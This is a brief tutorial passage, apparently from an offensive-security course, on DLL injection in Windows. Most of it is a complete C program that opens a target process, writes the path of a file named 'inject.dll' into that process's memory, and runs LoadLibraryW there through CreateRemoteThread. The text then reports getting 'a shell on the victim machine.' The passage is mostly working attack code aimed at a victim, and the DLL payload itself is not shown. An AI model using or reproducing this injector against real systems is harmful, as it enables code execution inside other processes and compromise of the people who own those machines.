In this section we will discuss the DLL Injection
Let’s Create Our Snippet
#include <stdio.h>
#include <Windows.h>
HANDLE process = NULL;
HANDLE thread = NULL;
DWORD PID = 6168;
DWORD TID = NULL;
LPVOID buffer = NULL;
wchar_t malDLL[] = TEXT("C:\\\\Users\\\\Evasion\\\\inject.dll");
int main()
{
process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
buffer = VirtualAllocEx(process, NULL,sizeof(malDLL),MEM_COMMIT , PAGE_READWRITE);
WriteProcessMemory(process, buffer, (LPVOID)malDLL, sizeof(malDLL),NULL);
PTHREAD_START_ROUTINE routine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("kernel32")), "LoadLibraryW");
CreateRemoteThread(process,NULL,0,routine,buffer,0,NULL);
CloseHandle(process);
return EXIT_SUCCESS;
}
Now let’s run and see if it works
and we got a shell on the victim machine.